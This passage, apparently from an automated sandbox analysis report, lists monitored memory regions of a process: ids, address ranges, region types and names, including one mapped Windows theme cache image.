end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21411 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21412 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21413 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 21414 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21415 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21416 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21417 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21418 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21419 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21420 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21421 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21422 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21423 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21424 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21425 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21426 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21427 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21428 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21429 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21430 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21431 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21432 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21433 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21434 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21435 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21436 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21437 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21438 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21439 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21440 start_va = 0x1e80000 end_va = 0x1e80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 21441 start_va = 0x58e0000 end_va = 0x59d9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000058e0000" filename = "" Region: id = 21442 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21443 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21444 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21445 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21446 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21447 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21448 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 21449 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21450 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21451 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21452 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21453 start_va = 0x54a0000 end_va = 0x5509fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 21454 start_va = 0x9870000 end_va = 0x9d61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009870000" filename = "" Region: id = 21455 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 21456 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21457 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21458 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21459 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21460 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21461 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21462 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21463 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21464 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21465 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21466 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21467 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21468 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21469 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21470 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21471 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21472 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21473 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21474 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21475 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21476 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21477 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21478 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21479 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21480 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21481 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21482 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21483 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21484 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21485 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21486 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21487 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21488 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21489 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 21490 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21491 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21492 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21493 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21494 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21495 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21496 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21497 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21498 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21499 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21500 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21501 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21502 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21503 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21504 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21505 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21506 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21507 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21508 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21509 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21510 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21511 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21512 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21513 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21514 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21515 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21516 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21517 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21518 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21519 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21520 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21521 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21522 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21523 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21524 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21525 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21526 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21527 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21528 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21529 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21530 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21531 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21532 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21533 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 21534 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21535 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21536 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21537 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21538 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21539 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21540 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21541 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21542 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21543 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21544 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21545 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21546 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21547 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21548 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21549 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21550 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21551 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21552 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21553 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21554 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21555 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21556 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21557 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21558 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21559 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21560 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21561 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21562 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21563 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21564 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21565 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21566 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21567 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21568 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 21569 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21570 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21571 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21572 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21573 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 21574 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 21575 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21576 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21577 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21578 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21579 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21580 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21581 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21582 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21583 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21584 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21585 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21586 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 21587 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21588 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21589 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21590 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21591 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21592 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21593 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21594 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 21595 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = 